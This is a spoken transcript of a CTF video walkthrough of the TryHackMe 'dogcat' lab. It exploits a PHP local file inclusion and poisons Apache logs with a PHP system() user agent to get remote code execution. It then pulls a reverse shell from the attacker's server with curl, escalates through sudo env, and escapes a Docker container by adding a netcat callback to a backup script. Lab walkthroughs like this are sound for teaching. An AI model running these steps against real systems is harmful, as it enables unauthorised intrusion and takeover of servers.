 Hello everyone, my name is John Hammond and this is another try hack me video today I want to be showcasing the dog cat room that came out just a few days ago, right? I think it was actually like April 17th and the time recording is April 22nd So we'll see how we do it looks like we have to join this room I've got it up here on my screen and I believe this is a free room so we can access it totally just fine I'm connected with my John Hammond YouTube account that is free And I guess I should clear out some of the stuff from my other video my bad Trying to knock a few out today and trying to get trying to get back to it So let's make a directory dog cat and let's hide over there Let's sort of read me files. We've got some notes that we can keep track of and I'll call this dog cat The IP address I just like to keep track of as a little environment variable or just a variable I could use and reuse pretty easily So let's go ahead and do this It says I made a website for viewing cat and dog images with PHP If you're feeling down come look at dogs and cats the machine may take a few minutes to fully start up Okay, so not a whole lot of answers or guided I guess a walkthrough here. It's more of a challenge room. It says what's flag one? What's flag two? What's flag three? What's flag four? So we are just off the races kind of on our own So let's do our own thing. Let's uh, let's go see if this machine is up I guess I'll ping this guy. Let's export this guy That and then let's ping our IP address good Is he up and available? He is okay dog cat a gallery of various dogs or cats. What would you like to see? I'd like to see a dog, please. Oh This is wonderful How many dogs does it have oh my gosh This is the real YouTube content you guys came for How we got any cute cats My girlfriend and I are gonna get a dog. We're that's is a ginormous image. Holy cat. I don't want I don't want that That's not a dog. That's just white space. We want to we want to get a sheet, but you know Okay Let's go find out what's really going on here if I look at the URL We've got view equals dog, which is kind of peculiar because maybe we could view some interesting things The view looks to be a variable which seems to be being set to kind of our option here If I set it to a dog or a cat Maybe we could view maybe the home page like index Only dogs are cats are allowed. That's annoying cat dog those work What about I Guess I can't like you can't do some local file inclusion all the way up to it's that we're password in this case Because I think it's probably adding a dot PHP extension on here So what this is doing though if it is adding a PHP extension Well, we could abuse or some of the PHP local file inclusion tricks and techniques where we can say PHP LFI filter Because we could supply a filter for What we might be looking for and that way we won't have it interpret the actual PHP tags. We could perhaps include a Any resource that we really really wanted to and encode it with base 64 so that way what it's encoded in base 64 We won't see the real Base 60 real PHP tags being interpreted and evaluated by the server We'll see them as text that we can go ahead and manipulate and access. So let's just steal the syntax I always go to this resource. I always have to Google find it Pillar all the things has it just as well, but I always end up looking for that I don't play darts comm application security site. So let's try to view That syntax for a PHP filter convert base 64 encode And I probably should have got the rest of it there I need to specify a resource. Yeah resource equals and then what we want to actually see so resource Let's try it for dog and looks like we have some base 64 encoded. So that would work for us Let's go ahead and echo that base 64 string into our base 64 decoder And it says image source dogs and a random Okay, it looks like there are 10 images and they're all JPEGs Interesting, let's see if we could actually access that index PHP now only cats or dogs are allowed Can I does dog have to be included in that? How does that work? maybe if we Ask for dog But we also went to a parent directory. So we were to move up. Could we still access index? Oh, yeah Yeah, yeah, yeah, okay. So index up PHP now has all of that So let's try and Echo that into base 64 tack D. Cool. Okay. So now we have the PHP source code Let's redirect this to an index PHP. Let's go ahead and sub all that so we can see it with real highlighting View cat or dog just as we saw and it has to contain the string dog or cat return string position And it gets oh and it also includes the extension if the extension is set with a get variable Oh, we can control that it will use that otherwise it will specify PHP oh Okay, so we could access a lot here Because if we can control the extension and it's not going to add anything else Maybe we could verify anything that we we could read out anything that we particularly wanted to let's try that we could It needs to have dog in the string, right? An extension could be anything It will include it so without using our filter now that we've got the source code of the page Maybe we could include dog up up up up up To etc password and let's actually use the ampersand to specify X EXT should be nothing and There were there we go. Now. We've looked at it set of a password so we could potentially leak out any files that we wanted to Maybe because we have local file inclusion Maybe we could access the log file of this web server and and see if it's seeing our requests or what headers are included Because maybe we could actually get our own PHP code executed we want to elevate what we have from our local file inclusion exploit or this vulnerability and Leverage it to remote code execution so we could do some more dangerous stuff Maybe get control of the box. So where would that be var? Apache access log Nope, okay. That's not it. Is it HTTP D Now we have to try and determine where we're actually seeing our logs Apache log files Var log HTTP D access log access underscore log Var log probably need access Dot log nope Apache to oh Okay, there we go var log Apache to access log now. We have a lot of results We can actually see all of our attempts here So var view dog etc etc etc and it includes our user agent my face is in the way So you can see that here with any of these actual user agents that I'm supplying is that it is keeping track of the syntax And if we were to specify our user agent, maybe we'd be able to actually Specify our user agent of PHP code that we would want to execute if we were to load this page Maybe it'll actually go ahead and execute that for us. Let's try that. I'm gonna actually do that in curl I'm gonna have a separate request so I can kind of make that smart for me I'll go to this page just getting the URL itself. I will include my user agent as a Header for curl with the tack capital H argument and we're gonna include PHP syntax in here So it's gonna be walk a walk per Question mark PHP right because it's the opening PHP tag and then we'll run the system command And we're gonna end up doing this with an argument that can be passed to the web server So I'll use that HTTP get variable the way we can access that is with a PHP variable But the PHP variable is prefixed with the dollar sign the same one that bash uses So if we're using a double quote here, we need to go ahead and escape that string with the backslash So that way it'll be able to say user agent equals PHP system backslash dollar sign And I'll use get with the underscore here and I'll specify C as the name of my string the argument that I want to use I'll close the parentheses to the system call and that and then I'll close the PHP tags and end my double quoted string So now when I go ahead and run this it should return just the page here Just the index that we were requesting is the home page But we should have placed this user agent into the Apache actual access logs that we were able to see with our local file inclusion So because that can read those PHP tags it'll execute PHP and it'll potentially allow us some command execution So if I go back to my web browser, we should be able to see this I'll go ahead and refresh the page and looks like we have a lot of core requests Okay peculiar and system says it cannot execute a blank command. That's good because we haven't actually supplied that C variable whatsoever So I you might you might notice I had to clean up this page I reset the machine a lot my p address is different because I broke it because when I was trying to get the syntax Right PHP would whine it would get an error And then once you get an error with this kind of avenue this this route that we're taking this attack vector is Once you bork the access log if you have a PHP error, it won't return to you whatsoever and Well now you've completely screwed yourself out of this potential attack vector because you can't get any more PHP in that code Because every time you try and read this file, it's gonna break So that's the potential danger and risk in doing this technique But now we finally got it right system is going to be able to execute some commands if we were to supply a C value so I'll try and go ahead and supply as Http variable I'll use my ampersand here c equals id and now we can actually see the output here We have dub dub dub data dub dub dub data etc etc etc so now we have code execution We've leveraged our local file inclusion to remote code execution So let's see if we can take this technique and go ahead and get a shell So what I'm gonna do is I'm going to start a little netcat listener I'll use netcat to lmvp 9 9 9 9 just quad 9 should work for us and let me just kind of verify that I can get to it I'll go ahead and check my IP address. So show ton zero. I am 10 8 9 12 I'll just steal that out here and I'll see if I can run that command 9 9 9 9 and Looks like it didn't go through to me. Do I have the netcat command available? We don't really know so other options we could try are using the bash technique We could try using Python as our reverse shell. So let's go ahead and go down some of those routes Let's go to pentest monkey reverse shell cheat sheet Let's grab a Python one and Just for syntax wise, let's see if we can actually get output from Python. I'll use Python and taxi I will do print Hello, or just a lot of a's actually So we'll see if we have that output seemingly not we can try that with Python 3 Still nothing so no output from them. I guess we don't have that we could try bash taxi Echo a so maybe we'll have be able to execute bash looks like we can in that regard So we could try that bash reverse shell just to try it just to see we might not actually get anywhere with that But I think it's worth to try because Python didn't seem to work out for us So let's go ahead and modify this string And I do want that IP address 10 8 9 12 And we're listening on 9 9 9 9 So let's go grab this string Try to see if we can actually execute that Maybe not through the browser, but hey We'll give it a go Looks like that failed didn't go to our reverse shell. We could try this with the curl. We could try with requests Just to kind of check all of our dots I'll try that because uh, this is kind of new. I haven't I haven't particularly done this Room just yet So forgive me for kind of waiting in the dark Let's go ahead and access this page I don't need that All that syntax here, but I do want to go ahead and specify these as arguments So we just want to get that URL and we'll say Params because we'll pass these all as get variables to with with a URL requests. So view can go ahead and equal that Extension can equal nothing because we're supplying our own extension. And let's just say c Can go ahead and equal our shell command Let's see if that will work for us So we do need requests to be able to do this in python. I will import requests and I'll do r equals requests Dot get on the homepage With our params equal to the params. I'll try and run this Seemed like it came through and no shell. Okay, so I don't have a reverse shell just yet what we could try and do is leverage this out to Maybe stage our own php reverse shell We could go ahead and simply echo a and just a test and make sure we can write and read things Let's just call a little test file Let's try to run this and now if I go ahead and access this log file Let's change that command to actually cat out test Okay, now we have that a variable there So we could potentially build our own php shell with maybe some base 64 repeatedly adding things So let's try let's get a php reverse shell. I think I still have mine. I think I still have a copy opt php reversal. Yep, let's just call this a Shell dot php in our current directory. So let's modify this. So we have our own ip address 10.8.9 dot 112 is that right? I think that's me I hate when I repeatedly forget these but it happens to me all the time 112 and let's go to port 999 9999 So let's go through every single line in here Let's actually clear these comments out because I don't care about them all that much So and let's let's actually echo each of these and start to build them into our script. So let's Let's let's build it out onto the file system. I'll show you what I mean Let's go ahead and kind of modify make make these go away so we can verify we can read our own shell So let's do with open shell dot php as a handle. Let's do handle dot read lines um, and let's just say Let's let's grab base 64 in here. So we can go ahead and base 64 and code some of these things Let's say lines can equal read lines and let's actually strip out all the new lines from the salty x dot strip for x In our handle read lines And now let's actually base 64 and code these. So let's do that just in the while loop so we can go ahead and print The lines that we have all as an array Bx is not defined. Oh, sorry. Yep. I don't need that b in there Looks like we have all of our lines as a array or a list. So that's good. Let's try to Do Change this so that we can base 64 dot b64 encode Each of these and now they're all base 64 lines. So that works well for us So now what we can do is we can actually make these arguments Real for us And four line in all these base 64 encoded lines. Let's specify the parameters can actually equal echo the Line That's all use a percent here. Actually, I'll just use format because I think python 2 has that format, right? Sublime text is set up with python 2 right now. So I know you'll hate me for using python 2, but That's that's just where we are base 64 line into and let's add it into rev shell dot php And let's include that so we do that repeatedly repeatedly repeatedly So we could build our shell and then after that's built Let's go ahead and We should verify what uh directory we're in before we go through with this Okay, we are in our www.html. So when we create a file with the php extension in the current directory It will go ahead and add it And make it publicly accessible for us so we can reach our reverse shell and pull that back So now after that let's go ahead and And base 64 attack d rev shell dot php Because that's the file name that we've created and let's redirect that to shell dot php So now We are adding every single line into a rev shell dot php file that will are originally base 64 decoded Then we'll go ahead and base 64 decode that shell So we have a shell dot php, which is the raw php file If we go ahead and request that eventually we should be able to go ahead and see Okay, if we echo or ls that shell dot php It should exist for us just by simply running our script and we'll have our reverse shell. Let's try it Sending a ton of requests to the web server building out our rev shell dot php file Renaming that or at least base 64 decoding it. So eventually we do have shell dot php None of these Are they being executed? Yes, they are Because we're requesting that page Just trying to think in my head like is this a valid technique will this work for us to get our reverse shell Taking a little bit of time I don't know how long it'll take so we'll pause Okay, he finished in just under an hour. So if we go back to our page, let's ls shell dot php Which does seem to exist if we were to verify that our netcat is still running What we could do is we could go to shell dot php and Called undefined function php set time limit on that guy. So our set time limit must not have worked Are we missing a new line there? Maybe that's the immediate function is failing. So I guess that Doesn't work well for us If I echo nothing to base 64 decode, does it work? Yeah, okay Maybe we could change this up and base 64 decode it as we're Developing the script. So let's rm rev shell Go back to our command to remove rev shell dot php Now if I ls Okay, I have shell dot php, which we know is broken and rev shell, which we'll need to add So let's go ahead and build this all out Base 64 decoding that output and adding it in as needed Let's wait again Okay, another one that took just a minute um, our rev shell should be Created so we should have rev shell dot php. There it is Let's verify that rev shell. Let's just cat it out And that is also removing our whitespace Why does it do that? It's not adding a new line We could try to echo an empty line into rev shell dot php Let's try that Okay, now that we've added a new line, let's go see if we can actually see that In our rev shell dot php Seemingly no new lines Let's try and run it regardless Let's go to rev shell dot php And that's loading and failing On line 95 Okay Okay, let's try another avenue. Do we have wget? Wget tag h no curl Curl tag h. Oh looks like we have curl. Okay. Maybe that will work. Let's spin up a server Python tag m HTTP dot server good and then let's Go ahead and rm shell dot php if we still have it and Let's download our curl to what is curl to download to a file? I think it's just tag. Oh Tag oh Yep, okay So curl HTTP colon colon 10 dot 8 dot 9 dot 1 1 12 port 8,000 shell dot php And let's redirect that to Or output it sorry we attack oh Shell dot php So looks like okay it retrieved it And now we should have a Shell dot php that we should be able to access That looks like it connected. Okay. Excellent. Finally. We have a shell Let me uh stabilize the shell. Do we have python taxi? I don't know why I chose ls to work. We don't have python Do we have python 3 python 3 is also not found? Okay, so I guess we Don't particularly need to stabilize the shell. I guess we'll be working Clearly export term equals X term now if I clear, okay, he's good. Let's see what we got now. We're moving around the file system We were in var www html and when I saw the output earlier, I saw a flag dot php So let's just cat that out. Okay There's our first flag We can go ahead and submit that And now let's Go navigate around the file system. Do we have netcat? We don't have netcat huh Well, let's just cat flag to Um, that has that strange name. So let's cat that out LFI to rcc. Yes. Thank you. We did that eventually I don't know why we What's flag three? So Let's try to pre-vesc. We don't have netcat. We know we have curl so we could download a little in peas let's um Let's move or copy or opt Lynn peas into this directory and let's move into devshm. Can I run bash? Uh That was a stupid idea. Oh, I am in devshm. So I'm just fine I guess now I just no longer have a prompt because I ran bash stupid me if I exit bash. Okay. Good. I'm back in my Back in my thing now that we have uh devshm and we've got lin peas over in our web server Let's go ahead and curl that so HTTP 10.8.9 112 8000 and it's lin peas dot sh. So I'll save that as lin peas Dot sh Taking a sweet time looks like he's got it. So let's mark that as executable And now let's run lin peas dot sh and we'll t that to lin log just so we have a log copy of it and I cannot Why can I not execute that I made it executable? That's weird to me Catlin peas Is that not all of it? Okay, I guess we'll do some manual immigration. What can I run a pseudo? Ah Uh env What? Does that let me do oh it just displays everything Can I gtfobans that? gtfobans github Env Oh You just pass it as an argument So pseudo, okay let's Pseudo that again, and let's bin bash to get regular bash and now I'm root I probably didn't need to do root or bash so I would not have a shell. Let's just do bnsh So I have my prompt back Or I just don't have my prompt whatsoever. That's totally fine Let's go check out the root directory and there is flag three. So let's cat that out Different environments What is that referring to is this is this all this tech la? Uh, we are the docker environment. Okay, so when it's a different environment, I was kind of curious Did it put us in a docker container? And I guess we are in a docker container. So that doesn't particularly help Um, I guess we can look around and see what else might be odd without using lin peas Maybe lin enum would work or whatever the case may be. Oh opt has something called backups ls backup.sh backup.tar. Do we have that as a crontab? tacky Oh, we're in a docker container. So we probably can't see that. Um tar xzvf backup batar Oh Okay So it's starting the entire Container Oh, and it is Checking out that backup script. So it might be running that I might be doing that What is a backup.sh? cat backup.sh Looks like it is tearing something from outside of the container. Okay, awesome And that container must be the mounted to kind of share that we're in. So what we could do Is add some Other netcat or virtual syntax or maybe maybe bash or whichever one might work Let's try with netcat Let's get this guy to see if we can get break out of this container Um, let me netcat telkellenvp 888 And let's modify this to now bring me to 10.8.9.1 12 quad 8 And maybe if that is actually being ran We could get some stuff. There's no Super special characters in there. So let's add that to backup.sh Okay What is that root? Oh, no, that's the directory that was just made when I untart it So how does backup.sh look right now? Now it tars everything and has a netcat command to call back to me That better be the right IP address It is okay. So I guess I'll wait a few minutes and see if I get a shell back Kind of driving blind here We could try the bash technique as well Like if that command fails, then oh, oh, oh, oh, it worked Okay So now we're in the real file system and we have flag.txt Nice, nice. Okay. Cool. Wow. That took More than it needed to to get that done, but Okay That was dogcat So Finally did it, right So a little bit of recap, right We found the web page that was seemingly doing some file inclusion to be able to read a dog or a cat And we could abuse that we it was limiting our file extension That we didn't know admittedly at first But once we found that okay, we could do some local file inclusion with the php filter technique That way we could read the source code of the pages and we could see that we could specify a file extension If we didn't use the file extension and we left it empty so we could supply our own in the file name Then we would have our any any actual Like local file inclusion that we wanted to not just strictly limited to php files So we could pull it set a password so we could see the access log for Apache in the web server And that was the goldmine because then we were able to actually inject some php code in and get Remote code execution because php will execute and it's server side so php would allow us to Put some commands in and run our own commands and we tried some techniques I was bumping around trying to okay pull in a reverse shell Maybe echo one with with stupid echo base 64 techniques And then eventually we just curled one down and was able to pull one down off of our own website That we hosted so that was kind of neat and then Now that we had the reverse shell we try to pull some other things in to get lin p's some Manual enumeration working or automated enumeration working and that didn't work So we opted for our manual enumeration We could see that The dub dub dub data user or the user that we were running currently was able to run the env command or the environment command As root with sudo So we were able to use gtfo bins to see that as a privisk We could just simply fire up a root shell and then we could escalate Problem is we were still trapped inside of a docker container So we saw and we found we discovered that backups directory that was pulling some information in and out And running it manually on the host and that was fantastic because that gave us a route To get out of the docker container and actually get command execution on the real machine on the host itself And that is what that backups dot sh allowed us to do Eventually it called back Maybe that's running with a cron job or some scheduled task But with that we could find the fourth flag and we had root on the actual computer itself So holy crap long video a lot of mistakes a lot of learning I hope you guys enjoyed this video if you did like button comment button subscribe button, you know the drill Thank you guys. Thank you so much for watching. I'll see you in the next one. Take care